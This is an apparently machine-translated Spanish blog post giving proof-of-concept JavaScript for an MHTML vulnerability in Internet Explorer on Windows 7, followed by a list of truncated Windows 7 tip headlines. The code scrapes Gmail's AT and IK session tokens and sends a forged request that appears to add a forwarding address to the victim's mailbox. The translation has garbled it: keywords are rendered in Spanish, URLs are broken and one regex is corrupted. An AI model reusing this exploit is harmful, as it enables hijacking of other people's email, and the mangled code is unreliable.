Hace mucho tiempo que no se actualizaba el blog, se convirtió en un código de prueba de la vulnerabilidad de GMAIL MHtml en Win7, la última versión completa no sabía a dónde ir: -!
Vulnerabilidad de MHtml en Win7 < Br> para iniciar una solicitud AJax, a diferencia de XP solicita directamente el protocolo HTTP, la URL solicitada también debe estar en el protocolo MHtml, de lo contrario no hay permiso, la estrategia homóloga en Win7 parece ser más estricta que XP. No sé si alguien notó este detalle.
Para atacar GMAIL para el CSRF de la autoridad relacionada, debe tomar los parámetros AT e IK para tener éxito. Por supuesto, hay muchas formas de tomar estos dos parámetros, que pueden tomarse desde la COOKIE o directamente desde la página. El siguiente código se toma directamente de la página.
xmlHttp = new ActiveXObject ("Microsoft.XMLHttp");
XMLHttp.open ("GET", "mHtml: https: //mail.google.com/mail/h/0/", Verdad);
XMLHttp.send ();
XMLHttp.onreadystatechange = function () {
if (XMLHttp.readyState == 4) {
if (XMLHttp.status == 200 ) {
REX = /href=\\".*?at=({{ disco)) /"exg(XMLHttp.responseText);
AThash = RegExp. $ 1;
XMLHttp. Abrir ("GET", "mHtml: https: //mail.google.com/mail/", true);
XMLHttp.send ();
XMLHttp.onreadystatechange = function () {
if (XMLHttp.readyState == 4) {
if (XMLHttp.status == 200) {
REX = /GLOBALS=\\[.*?,"(.{10})",/.exec(XMLHttp .responseText);
IKhash = RegExp. $ 1;
XMLHttp.open ("POST", "mHtml: https: //mail.google.com/mail/? ui = 2" + "&ik = "+ IKhash +" &vIEw = mdlg &at = "+ AThash, true);
XMLHttp.setRequestHeader (" Content-Type "," application /x-www-form-urlencoded ");
XMLHttp. Enviar ("mdrp = 1 &mda =% 0D% 0A" + Tmail + "% 0D% 0A");
}
}
}
}
}
}
}
Windows 7 mis documentos, mis imágenes, mis videos y mi música se almacenan en la unidad C de forma
La instalación del sistema operativo se ha vuelto súper simple, y el novato puede instalar fácilment
En la actualidad, la versión de Win7 IE preinstalado es IE8, pero debido a que la barra de herramien
A veces hay muchos usuarios y autores. Después de reinstalar el sistema operativo, lo más p
Apriete el potencial de usar WIN7 para compartir Internet WIFI
Cambio del método de utilidad de apariencia de Buscaminas de Windows 7
¿Qué debo hacer si se crea el botón derecho del mouse y solo se muestra la carpeta?
Lanzamiento oportuno de los recursos del sistema Evita que la computadora ejecute soluciones Caton
Para que explique la función de restauración de imagen y restauración del sistema win7 (1)
Win7 instala el compañero perfecto de Office 2010
Uso del software Acronis DiskDirector para ajustar el esquema de partición en Win7
Análisis profundo del principio de administración de controladores de dispositivo de Windows 7
Enseñarle los accesos directos de apagado de Win7 /Vista y reiniciar los accesos directos
Modificación de la asociación de los tipos de archivo de Windows 7
El sistema Win7 tiene una solución de problema de ruido (controlador de tarjeta de sonido)
Cómo dividir las particiones de disco del sistema Win7 preinstalado
¿Cómo hacer que la red de descargas de Win7 esté en modo de suspensión?
Cómo instalar y usar http_load para hacer una prueba de estrés del servidor en Linux
¿Cómo se conecta el portátil al monitor? Método de pantalla externa de la computadora portátil XP
Cómo hacer kb3081438 error de actualización
Habilidades de número de puerto de consulta Win7
Personalización de su propio programa de ejecución rápida en el sistema Win7